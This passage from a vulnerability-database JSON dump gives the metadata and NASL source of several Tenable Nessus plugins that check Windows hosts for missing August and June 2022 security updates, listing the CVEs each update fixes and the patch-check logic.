\"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35792\",\n \"CVE-2022-35793\",\n \"CVE-2022-35794\",\n \"CVE-2022-35795\",\n \"CVE-2022-35797\"\n );\n script_xref(name:\"MSKB\", value:\"5016623\");\n script_xref(name:\"MSFT\", value:\"MS22-5016623\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016623: Windows 10 version 1809 / Windows Server 2019 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016623. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016623\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016623\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", 
value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016623'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:17763,\n 
rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016623])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-10T19:26:48", "description": "The remote Windows host is missing security update 5016629. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016629: Windows 11 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33670", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34712", "CVE-2022-34713", 
"CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35797", "CVE-2022-35804", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016629.NASL", "href": "https://www.tenable.com/plugins/nessus/163945", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163945);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-30197\",\n \"CVE-2022-33670\",\n \"CVE-2022-34301\",\n \"CVE-2022-34302\",\n \"CVE-2022-34303\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34699\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34705\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34712\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n 
\"CVE-2022-35757\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35761\",\n \"CVE-2022-35766\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35793\",\n \"CVE-2022-35794\",\n \"CVE-2022-35795\",\n \"CVE-2022-35797\",\n \"CVE-2022-35804\",\n \"CVE-2022-35820\"\n );\n script_xref(name:\"MSKB\", value:\"5016629\");\n script_xref(name:\"MSFT\", value:\"MS22-5016629\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016629: Windows 11 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016629. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016629\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016629\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016629\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-35804\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-08';\nkbs = make_list(\n '5016629'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:22000,\n rollup_date:'08_2022',\n bulletin:bulletin,\n rollup_kb_list:[5016629])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-01-16T17:48:36", "description": "The remote Windows host is missing security update 5014742. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\n - Local Security Authority Subsystem Service Elevation of Privilege Vulnerability (CVE-2022-30166)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014742: Windows 7 and Windows Server 2008 R2 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30135", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30149", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", 
"CVE-2022-30163", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014742.NASL", "href": "https://www.tenable.com/plugins/nessus/162191", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162191);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30135\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30149\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30163\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014742\");\n script_xref(name:\"MSKB\", value:\"5014748\");\n script_xref(name:\"MSFT\", value:\"MS22-5014742\");\n script_xref(name:\"MSFT\", value:\"MS22-5014748\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014742: Windows 7 and Windows Server 2008 R2 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014742. 
It is, therefore, affected by multiple vulnerabilities\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30141,\n CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\n - Windows Hyper-V Remote Code Execution Vulnerability (CVE-2022-30163)\n\n - Local Security Authority Subsystem Service Elevation of Privilege Vulnerability (CVE-2022-30166)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014742\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014748\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014742 or Cumulative Update 5014748\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30161\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014748',\n '5014742'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014748, 5014742])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n 
audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-10T19:27:19", "description": "The remote Windows host is missing security update 5016616. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "KB5016616: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (August 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33670", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34712", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", 
"CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35797", "CVE-2022-35820"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*"], "id": "SMB_NT_MS22_AUG_5016616.NASL", "href": "https://www.tenable.com/plugins/nessus/163951", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163951);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2022-30133\",\n \"CVE-2022-30144\",\n \"CVE-2022-30194\",\n \"CVE-2022-30197\",\n \"CVE-2022-33670\",\n \"CVE-2022-34301\",\n \"CVE-2022-34302\",\n \"CVE-2022-34303\",\n \"CVE-2022-34690\",\n \"CVE-2022-34691\",\n \"CVE-2022-34696\",\n \"CVE-2022-34699\",\n \"CVE-2022-34701\",\n \"CVE-2022-34702\",\n \"CVE-2022-34703\",\n \"CVE-2022-34704\",\n \"CVE-2022-34705\",\n \"CVE-2022-34706\",\n \"CVE-2022-34707\",\n \"CVE-2022-34708\",\n \"CVE-2022-34709\",\n \"CVE-2022-34710\",\n \"CVE-2022-34712\",\n \"CVE-2022-34713\",\n \"CVE-2022-34714\",\n \"CVE-2022-35743\",\n \"CVE-2022-35744\",\n \"CVE-2022-35745\",\n \"CVE-2022-35746\",\n \"CVE-2022-35747\",\n \"CVE-2022-35748\",\n \"CVE-2022-35749\",\n \"CVE-2022-35750\",\n \"CVE-2022-35751\",\n \"CVE-2022-35752\",\n \"CVE-2022-35753\",\n \"CVE-2022-35754\",\n \"CVE-2022-35755\",\n \"CVE-2022-35756\",\n \"CVE-2022-35757\",\n \"CVE-2022-35758\",\n \"CVE-2022-35759\",\n \"CVE-2022-35760\",\n \"CVE-2022-35761\",\n 
\"CVE-2022-35762\",\n \"CVE-2022-35763\",\n \"CVE-2022-35764\",\n \"CVE-2022-35765\",\n \"CVE-2022-35766\",\n \"CVE-2022-35767\",\n \"CVE-2022-35768\",\n \"CVE-2022-35769\",\n \"CVE-2022-35771\",\n \"CVE-2022-35792\",\n \"CVE-2022-35793\",\n \"CVE-2022-35794\",\n \"CVE-2022-35795\",\n \"CVE-2022-35797\",\n \"CVE-2022-35820\"\n );\n script_xref(name:\"MSKB\", value:\"5016616\");\n script_xref(name:\"MSFT\", value:\"MS22-5016616\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/30\");\n script_xref(name:\"IAVA\", value:\"2022-A-0320-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0319-S\");\n\n script_name(english:\"KB5016616: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (August 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5016616. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability (CVE-2022-35747, CVE-2022-35769)\n\n - Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability (CVE-2022-30133, CVE-2022-35744)\n\n - Windows Bluetooth Service Remote Code Execution Vulnerability (CVE-2022-30144)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5016616\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5016616\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5016616\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30133\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
